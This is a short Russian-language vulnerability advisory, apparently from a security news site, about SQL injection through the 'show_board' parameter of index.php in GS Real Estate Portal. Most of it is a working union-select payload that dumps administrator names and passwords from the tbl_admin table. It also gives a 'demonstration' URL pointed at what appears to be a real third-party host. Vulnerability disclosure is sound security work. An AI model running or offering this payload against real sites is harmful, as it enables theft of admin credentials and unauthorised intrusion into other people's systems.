Программа: GS Real Estate Portal

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL
команды в базе данных приложения. Уязвимость существует из-за недостаточной
обработки входных данных в параметре «show_board» сценарием index.php. Удаленный
пользователь может с помощью специально сформированного запроса выполнить
произвольные SQL команды в базе данных приложения.

Эксплоит:

www.site.me/forum/index.php?show_board=99999+union+select+0,0,0,0,0,0,0,0,0,
concat(admin_name,0x3a,admin_pass),0,0,0,0,0,0,0+from+tbl_admin/*

Демонстрация:

http://hostnomi.net/int/forum/index.php?show_board=99999+union+select+0,0,0,0,0,0,0,0,0,
concat(admin_name,0x3a,admin_pass),0,0,0,0,0,0,0+from+tbl_admin/*

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии